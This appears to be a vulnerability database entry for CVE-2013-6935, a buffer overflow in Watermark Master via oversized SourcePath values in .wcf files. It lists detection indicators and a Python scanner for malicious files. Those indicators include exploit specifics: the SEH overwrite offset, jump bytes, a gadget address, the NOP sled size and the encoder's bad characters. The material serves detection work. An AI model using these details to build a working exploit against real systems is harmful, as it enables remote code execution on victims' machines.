CVE-2013-6935
published 2013-12-04


Priority P354 · critical · 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 32.35% (98.1th percentile)
Buffer overflow in VideoCharge Software Watermark Master 2.2.23 allows remote attackers to execute arbitrary code via a long string in the SourcePath value in a .wcf file.

Affected (1 range)

Vendor: videocharge
Product: watermark_master
Version range:
Fixed in:

Detection & IOCs (extracted from sources)

url: http://www.videocharge.com/download.php
url: www.videocharge.com/download/WatermarkMaster_Install.exe
bytes: \xeb\x06\x90\x90
bytes: 0x02700fee : popad # jmp ebp
  • The vulnerability is triggered by a long string in the SourcePath XML value within a .WCF file; monitor for .WCF files containing abnormally large SourcePath values (>516 bytes of padding before SEH overwrite).
  • The SEH overwrite uses a short JMP (\xeb\x06\x90\x90) followed by a ROP gadget at address 0x02700fee (popad # jmp ebp); detection of this byte sequence at the SEH chain offset (~516 bytes into SourcePath value) is a strong indicator of exploitation.
  • The exploit uses a NOP sled of 100 bytes (\x90 * 100) before the shellcode; scanning .WCF files for large NOP sleds embedded in XML attribute values can identify malicious files.
  • The Metasploit module targets this vulnerability as a fileformat exploit for Windows; monitor for WatermarkMaster processes spawning unexpected child processes (e.g., calc.exe or cmd.exe) as a post-exploitation indicator.
  • The exploit was tested only on Windows XP SP3; the hardcoded ROP gadget address (0x02700fee) is module-specific and may not be valid on other OS versions or patch levels.
  • The shellcode uses msfencode with bad-char filter excluding \x00\x0a\x0d\x3c\x22\x26; any detection based on raw shellcode bytes must account for encoder polymorphism if a different encoder or key is used.
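
A minimal file scanner for the first three indicators above, added here as an example (it is not code from the advisory, the vendor or any exploit module). It assumes SourcePath is stored as a double-quoted XML attribute; the `Item` element in the samples and the 32-byte NOP threshold are constructed for illustration.

```python
import re
from dataclasses import dataclass, field

# Assumption: the value is stored as an XML attribute, SourcePath="...".
# The closing quote is not required, so truncated or malformed files still match.
SOURCEPATH_RE = re.compile(rb'SourcePath\s*=\s*"([^"]*)', re.IGNORECASE)
PAD_LEN = 516                        # padding before the SEH record (from the page)
SEH_MARKER = b"\xeb\x06\x90\x90"     # short-jump bytes quoted on the page
NOP_RUN = re.compile(rb"\x90{32,}")  # constructed threshold; the page describes a 100-byte sled


@dataclass
class Finding:
    offset: int                      # file offset where the SourcePath value starts
    length: int                      # length of the value in bytes
    reasons: list = field(default_factory=list)


def scan_wcf(data: bytes) -> list:
    """Return one Finding per suspicious SourcePath value in raw .wcf bytes."""
    findings = []
    for m in SOURCEPATH_RE.finditer(data):
        value = m.group(1)
        reasons = []
        # Length is the encoder-independent signal: it holds whatever payload follows.
        if len(value) > PAD_LEN:
            reasons.append("oversized")
        # Marker bytes sitting exactly where the SEH record would be overwritten.
        if value[PAD_LEN:PAD_LEN + 4] == SEH_MARKER:
            reasons.append("seh-marker")
        # Long run of 0x90 inside what should be a filesystem path.
        if NOP_RUN.search(value):
            reasons.append("nop-run")
        if reasons:
            findings.append(Finding(m.start(1), len(value), reasons))
    return findings


# Constructed samples (not real project files; no payload or gadget address included).
BENIGN = b'<Item SourcePath="C:\\Videos\\clip.avi" />'
SUSPECT = b'<Item SourcePath="' + b"A" * PAD_LEN + SEH_MARKER + b"\x90" * 100 + b'" />'

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, scan_wcf(blob))
```

Because of the encoder caveat above, treat "oversized" as the primary signal and the byte-pattern hits as corroboration.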